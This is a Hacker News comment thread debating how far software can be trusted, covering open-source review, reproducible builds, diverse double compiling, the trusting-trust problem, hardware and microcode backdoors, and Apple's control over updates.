Hacker News new | past | comments | ask | show | jobs | submit login

But, at some point there must be trust. If you don't trust software, you can try to sandbox it, but now you have to trust the sandbox. This devolves very rapidly. Open source at least provides a facsimile of recourse - just go read the code - but how much of your currently-running open-source code have you actually read? For that matter, if you had, could you be confident that you'd understood it? The Underhanded C Contest is a thing, after all. A sufficiently paranoid individual can only run code they wrote themselves. Or, they can choose to run code without a strong understanding of what it's doing.

If Apple subverts their updates, that's mostly interesting as a signal of their trustworthiness moving forwards. The coolest thing about this is that we know it's happening at all, I think.




> Open source at least provides a facsimile of recourse - just go read the code - but how much of your currently-running open-source code have you actually read?

Wait, what? That is not the recourse that open source provides.

The great thing about open source is that you don't need every person to read the code, just one person who can either catch or verify the absence of user-abusive material.

Moreover, even if zero people read the code today, it is preserved so that state (or corporate) abuse can be revealed later, providing another disincentive to introduce abusive material.


Alright, but now you trust that person. Which might be fine, but as an exercise in paranoia is not the greatest answer. As a social proof, somewhat better - create the opportunity for many people to examine, and at least some of them will find things and talk about it. Now the trust is in the shape of the general mass of reviewers - that it contains people who will review the code and reveal their findings.


> Alright, but now you trust that person.

In a word: no. With open source code, you could use software authored by the NSA, like SELinux, or you could even hire a manifestly untrustworthy party like Hacking Team to author some code and still be able to trust the code.

In Apple's case, there is a fairly good reason to trust Apple because it would be a hell of a kabuki theatre production to have the FBI and Apple battle in a Supreme Court case while colluding in secret. But would you trust a defense contractor? A telco? Limit or ideally eliminate the need for trust. Fortunately it is possible to reduce the need for trust below having to trust groups or individuals.


Isn't that discredited by Apple's "goto fail" bug? A critical function was mistakenly circumvented in an extremely transparent way, and yet the source code sat on their website for a long time without anybody noticing. Nobody even ran coverity on it.


goto fail was in OpenSSL which many organizations use, but your point still stands.


No, this was a bug in SecureTransport, Apple's custom TLS implementation.


Oops. You're right. Sorry.


It's not just reading the code -- static analysis tools can provide some guarantees that the software isn't exfiltrating information from your box, making unsolicited connections, or leaving unexpected ports open.

In theory, we can perform the same analysis on the compiled program's bytecode. As the decompilation ecosystem gets better, we may view machine code or bytecode as transparently as source code.

Of course, your apple EULA may bind you against decompiling the machine code -- but it can be argued that you're not 'reverse engineering', you're just doing a virus scan.


Static analysis tools are very useful for identifying accidental security defects, however they really don't guarantee the absence of a deliberate security flaw or back door. You have to assume that the attacker has access to the same static analysis tools, and can thus find tricky ways to cause false negative scan results. Or perhaps the static analysis tool itself has been compromised?


All fair points -- nothing is guaranteed, but sooner or later you have to trust your tools. Like, maybe there's a backdoor in your compiler so certain lines of code are compiled so that they notify chairman mao when you shop for red notebooks ... .

The repeatable builds projects go a long way towards preventing this by producing identical bytes from different compilation chains. Ultimately it's good to have a combination of static analysis, multiple toolchains & 'many eyes' providing checks and balances for each other.


How do you know you are running the same software that everybody else is reviewing?


One solution is reproducible builds and signatures.

The bitcoin community, for example, uses Gitian to reproducibly build bitcoind. Both Bitcoin Core and Bitcoin Classic host repositories with signed hashes for the output of those builds:

https://github.com/bitcoin/gitian.sigs https://github.com/bitcoinclassic/gitian.sigs

(As I understand it, several Altcoins do the same as well)

Anybody can follow the published guides for how to perform such a build, and compare their results with the published ones. Because the published hashes are signed, you have a reasonable degree of certainty that a variety of people are involved in the process, which also gives you a greater degree of confidence in the quality of the binary releases even if you don't want to compile it yourself (and, if you do compile it, you're free to add to the consensus that the binary build is good by PRing your own results)


Please see the Reproducible Builds project, a vital contribution to answering this question.

https://reproducible-builds.org/


Reproducible builds do not cut it. If you have a known good binary signature, you'd also have a known good source signature and wouldn't have the problem.

Or, to put it in better words, where do you get the certificate to check your build from? At extreme paranoia levels, you simply can never be sure you have the same software as everybody else, thus the only safe alternative is reviewing your copy yourself.

(How do you know the computer is showing you the correct contents of your files? Didn't think that well enough yet.)


Diverse Double Compiling is a proven solution to the On Trusting Trust problem [0]. So, if a package maintainer signs a package and posts that signature on an https page, I can have a high level of confidence that the software I compile and run on my machine is identical.

Here is some advice from Schneier on running secure software against a state-level adversary [1][2]. However, even that is not immune from a black bag job [3].

[0] http://www.dwheeler.com/trusting-trust/ [1] https://www.schneier.com/blog/archives/2013/10/air_gaps.html [2] https://www.schneier.com/blog/archives/2014/04/tails.html [3] https://en.wikipedia.org/wiki/Black_bag_operation


Surely you aren't suggesting that a reasonable answer is to read the code yourself and compare it to a known version?

Obviously, the mainstream way is a hash-based file verification.

Which again, everybody needn't do - only a small number - in order to catch a bad actor in the act.

But I presume you are trying to make some bigger point. What is that?


It's not reasonable at all. But the only correct answer is reviewing the code yourself.


In Debian, with reproducible builds.


> But, at some point there must be trust.

Do you trust the developers? Okay.

Do you trust the developers, their infrastructure, AND the supply chain? Maybe a bitter pill to swallow.

Recommended reading: https://defuse.ca/triangle-of-secure-code-delivery.htm


If you trust the hardware, that is easier than it sounds. You just have to review the core and sandbox software - then you sandbox the rest.

The reason people mostly don't bother is because they can't also trust the hardware (in fact, our software is often more trustworthy than the hardware). Thus, the point is moot.


> A sufficiently paranoid individual can only run code they wrote themselves.

I'd say that is not sufficient because even in this case you trust someone: the manufacturer of the CPU on which the code would run.

It might surprise some people but you can examine code of a piece of software to check whether it has a backdoor even if it is closed-source by reading disassembly. Surely it requires some skills and is a bit time-consuming but it's doable for an ordinary individual. Reverse engineering software is not as difficult as many think. And as a matter of fact, a large number of people are reading disassembly of widely-used software to find vulnerabilities to sell in black markets. So I think it's unlikely for Windows or iOS to have maliciously planted backdoors.

On the other hand, it's tremendously difficult to reverse engineer hardware especially CPUs for an individual without a large budget. So if I were them I'd choose CPU as a place to put a backdoor because virtually nobody reverse engineers a modern CPU and thus it'd be very unlikely to be found.

By the way, contemporary CPUs can update itself through microcode updates.


> But, at some point there must be trust.

We may want to reach a point where we trust things we use, but if we're using a security-grade definition of trust and we're honest with ourselves, I think every one of us would admit that we're using something(s) that we do not trust. There just isn't enough time to properly review, test, and verifying things.


I generally speaking trust apple hardware. If I have adversaries powerful enough that they can convince tim cook to manufacture crooked device and make sure that I will get it when I buy my phone - you can write me off as dead anyway.

I don't trust apple ios software (unlike their OSX software), because I am not in position to choose if I trust them or not. The device decides.


Trust isn't binary, and verification does not require individual verification, but community or ecosystem verification.

If 3rd parties can audit software (including analysis of binary-only software), and can observe the software's behavior, and can watch the software's network traffic, then the chance of being caught violating user trust will generally be high enough to make the liability of being caught a genuine concern.

However, if updates are automatic, encrypted, and platform DRM prevents 3rd-party audit/analysis, the chance of being caught starts to dwindle down towards zero. That entire trust ecosystem disappears, and what we're left with is absolute trust in a corruptible third party, and no mechanism with which to verify.

The latter is exactly what Apple has built. They have a backdoor: the means to push absolutely trusted software while preventing all third-party audit and analysis.


At least for some problems, you need very little trust. For example, you don't have to trust software for sorting your stuff, because checking that something is correctly sorted is very easy. There is an entire field of algorithms that produce answer that are easy to check, it's called Certifying Algorithms.

Unfortunately that doesn't really work if you have to trust your software _not_ to do tasks that you don't want done, like sending your personal stuff to a third party.


Even there, you have to verify that it doesn't have other side effects beyond sorting (like phoning home your data) and that the mechanisms that enforce any sandboxing meant to stop this also work, etc.


> can only run code they wrote themselves

They of course can't use compilers either [1] and have to write the machine code by hand. Now if you consider the CPU's microcode as general code as well which can be updated, what is he to do now?

So I agree, you need trust, and the less parties you need to trust, the less chance of getting bit.

[1]: http://c2.com/cgi/wiki?TheKenThompsonHack




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: